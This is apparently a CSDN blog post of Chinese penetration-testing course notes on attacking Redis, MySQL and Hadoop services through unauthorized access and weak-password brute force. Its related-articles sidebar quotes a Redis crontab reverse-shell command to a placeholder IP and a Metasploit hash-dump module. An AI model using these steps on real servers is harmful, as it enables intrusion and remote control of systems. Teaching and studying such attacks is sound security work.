55、服务攻防——数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE

最新推荐文章于 2024-10-02 05:39:15 发布
最新推荐文章于 2024-10-02 05:39:15 发布
阅读量587 收藏 5
点赞数 9
分类专栏: 小迪安全 文章标签: redis hadoop mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/136701326
版权

文章目录

常见服务应用的安全测试:

  1. 配置不当——未授权访问
  2. 安全机制——特定安全漏洞
  3. 安全机制——弱口令爆破攻击

应用服务安全测试流程:

  • 判断服务开放情况——端口扫描&组合猜解等

    端口扫描:服务开放,绑定端口没开放,什么情况? 内网或防护软件
    组合猜测:就是php+mysql这种组合
    信息来源:报错、探针等

  • 判断服务类型归属——数据库&文件传输等

  • 判断服务利用方式——特性漏洞&未授权访问&弱口令爆破

在这里插入图片描述

  Mysql默认配置本地登录root用户,远程连接请求拒绝。对mysql进行弱口令爆破,需要借助phpmyadmin进行猜解,phpmyadmin是第三方的数据库管理应用且搭建在对方的服务器上(可以远程访问),phpmyadmin登录mysql数据库,这个数据发送是本地到本地的过程,所以可以进行弱口令爆破。

怎么判断phpmyadmin呢?直接用google语法,例如inurl:phpmyadmin

Hadoop主要检测50010端口。

Redis未授权访问
Redis默认端口6379。Redis配置文件中,bind 127.0.0.1未被注释,外部主机无法连接此Redis数据库。
在这里插入图片描述
Redis默认安全模式关闭
在这里插入图片描述
Redis默认未设置密码
在这里插入图片描述

windows上Redis终端:
在这里插入图片描述
登录Redis之后,直接在终端写shell。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

PT_silver
关注
专栏目录
服务攻防——数据库安全授权访问、弱口令
m0_61506558的博客
12-14 584
关于判断服务是否开放进行信息收集的内容,可能通过扫描工具,如果遇到WAF的话,通过常用搭建网站的组件进行尝试,或者通过特定服务提供的报错信息进行判断......由于基于 Erlang 的 JSON 解析器和基于 JavaScript 的 JSON 解析器的差异,在 1.7.0 之前的 Apache CouchDB 和 2.1.1 之前的 2.x 中,可以提交_users具有重复键的文档,roles用于数据库内的访问控制,包括特例_admin角色,表示管理用户。
实现登录验证——token&redis
qq_43524048的博客
11-19 4683
基于token的登录验证基于token的登录验证实现1. Redis数据库 存储token2. `JWT` 产生token3. 实现登录验证基于Session的登录验证 基于token的登录验证 token(令牌) 原理: 登录流程: 访问流程: 实现 下述代码的实现基于springboot 用户数据主要存储在mysql数据库的user表中 dao层使用了springdata jpa 1. Redis数据库 存储token 登录的信息仅需一个key-value,如果直接
55天:服务攻防-数据库安全&Redis&Hadoop&Mysql&授权访问&RCE
weixin_71529930的博客
04-08 1257
也会输入这个文件当中造成影响,可以新开一个kali窗口,进行纯净版的输入,如图。因为root用户只能本地登录,可以采取利用phpmyadmin去远程登录利用,爆破密码。1.redis.conf中 bind表示允许谁访问,被注释了表示都可以访问。首先centos中的计时任务,可以写在/var/spool/cron中。利用该攻击方式,还需要允许密钥对登录,并且redis以root登录。访问你的ip地址/cluster/apps,如果存在证明有漏洞。如果没有端口,利用组合猜测,例如:php-mysql
小迪安全 第55服务攻防-数据库安全&Redis&Hadoop&Mysql&授权访问&RCE
Morrowindzzw的博客
12-14 1190
set yy"\n\n\n* * * * *bash -i>& /dev/tcp/反弹ip地址/5555 0>&1\n\n\n" //设置启动命令。use auxiliary/scanner/mysql/mysql_authbypass_hashdump //选择该模块。config set dir /var #设置 WEB 写入目录在/var。config set dir /var/spool/cron //设置启动目录。set threads 10 //设置线程。
day55 数据库安全&Redis&Hadoop&Mysql&授权访问&RCE
wanjia01的博客
01-28 492
知识点:1、服务攻防-数据库类型安全2、Redis&Hadoop&Mysql安全3、Mysql-CVE-2012-2122漏洞4、Hadoop-配置不当授权三重奏&RCE漏洞3、Redis-配置不当授权三重奏&RCE两漏洞#章节内容:常见服务应用的安全测试:1、配置不当-授权访问2、安全机制-特定安全漏洞3、安全机制-弱口令爆破攻击#前置知识:应用服务安全测试流程:见图1、判断服务开放情况-端口扫描&组合应用等2、判断服务类型归属-数据库&文件传输&通讯等。
网络安全全栈培训笔记(55-服务攻防-数据库安全&Redis&Hadoop&Mysqla&授权访问&RCE
qq_46343633的博客
01-19 1357
1、服务攻防数据库类型安全2、Redis&Hadoop&Mysql安全3、Mysql-CVE-2012-2122漏洞4、Hadoop-配置不当授权三重奏&RCE漏洞3、Redis-配置不当授权三重奏&RCE两漏洞#章节内容:常见服务应用的安全测试:1、配置不当-授权访问2、安全机制特定安全漏洞3、安全机制弱口令爆破攻击#前置知识:应用服务安全测试流程:见图1、判断服务开放情况-端口扫描&组合应用等2、判断服务类型归属数据库&文件传翰&通讯等。
【小迪安全2023】第54天:WEB攻防-通用漏洞&跨域CORS资源&JSONP回调&域名接管劫持;第55天:服务攻防-数据库安全&Redis&Hadoop&Mysql&授权访问&RCE
人若无名,便可专心练剑
04-23 1242
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,跨域资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出XMLHttpRequest请求,从而克服了AJAX只能同源使用的限制,以使不同的网站可以跨域获取数据。环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。1、子域名接管-检测&探针&利用。
数据库服务安全--Mysql授权--Hadoop授权配合RCE--Redis授权&RCE
weixin_68243135的博客
11-21 2298
数据库安全漏洞--MySQL--Hadoop--Redis
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&授权访问&RCE-漏洞复现
ran的博客
05-05 3533
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
Java牛客网社区项目——知识点&面试题
热门推荐
weixin_48610702的博客
04-19 3万+
请简要介绍一下你的项目? 这个项目的整体结构来源于牛客网,主要使用了Springboot、Mybatis、MySQLRedis、Kafka、等工具。主要实现了用户的注册、登录、发帖、点赞、系统通知、按热度排序、搜索等功能。另外引入了redis数据库来提升网站的整体性能,实现了用户凭证的存取、点赞关注的功能。基于 Kafka 实现了系统通知:当用户获得点赞、评论后得到通知。利用定时任务定期计算帖子的分数,并在页面上展现热帖排行榜。 什么是Spring框架? 有很多模块组成,利用这些模块可以方便开发工作。这些
Redis授权访问漏洞
周星星的博客
08-22 1551
Redis授权访问漏洞复现以及利用
【网络安全】Redis授权访问查看敏感文件
你在看屏幕的同时,屏幕也在注视着你
12-21 1608
redis服务查看敏感文件
Redis: 持久化之RDB和AOF
Wang的专栏
09-29 997
Redis 有一个高质量的课题:数据安全性与数据可靠性Redis 是一个内存型数据库,数据大部分都是存在内存里面当信息在内存中流通时,Redis 节点突然就故障挂掉当重新启动的时候,内存中的数据肯定是全部丢失了如果在这种情况下,Redis 提供了对应的持久化方案,它有两种持久化方案RDB和AOF可以把内存中的数据保存到磁盘,避免数据的流失关于RDB,我们需要了解到什么是持久化什么是快照RDB的工作原理,包括它的优点和缺点关于AOF,需要知道为什么需要有AOF。
Redis-常见数据类型(修改ing)
qq_74812898的博客
09-29 942
redis常用数据类型
Redis-持久化
qq_74812898的博客
09-28 941
redis持久化
如何使用Redisson的布隆过滤器?
最新发布
付聪
10-02 204
【代码】如何使用Redisson的布隆过滤器?
尚硅谷redis147答疑 redis源码redisObject dict
2401_86733530的博客
09-28 541
总结:虽然在`redisObject`的结构定义中没有直接看到`dict`,但在实际使用中,对于哈希类型的对象,`redisObject`的`ptr`字段会指向一个`dict`结构。- 当Redis创建一个哈希对象时,它会创建一个`redisObject`,将其`type`设置为哈希类型,然后`ptr`指向一个新创建的`dict`结构。- Redis使用了一种灵活的设计,`redisObject`的`ptr`字段可以指向不同类型的数据结构,包括但不限于`dict`。
Redis篇(环境搭建)
wlcass zhengge blog
09-26 817
Windows系统中启动Redis,直接双击redis-server.exe即可启动Redis服务redis服务默认端口号为6379。双击 redis-cli.exe 即可启动Redis客户端,默认连接的是本地的Redis服务,而且不需要认证即可连接成功。前面我们已经启动了Redis服务,默认情况下Redis启动后是在前台运行,而且客户端不需要密码就可以连接到。如果没有指定,就说明可以接受。通过 redis-cli 可以连接到本地的Redis服务,默认情况下不需要认证即可连接成功。
Redis授权访问与SSH key利用分析
本文主要探讨了Redis授权访问的安全风险,以及如何利用这种漏洞配合SSH key文件进行恶意活动。Redis是一个高性能的键值存储系统,常用于缓存和数据持久化,但其默认配置可能存在安全隐患。 一、Redis授权访问...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值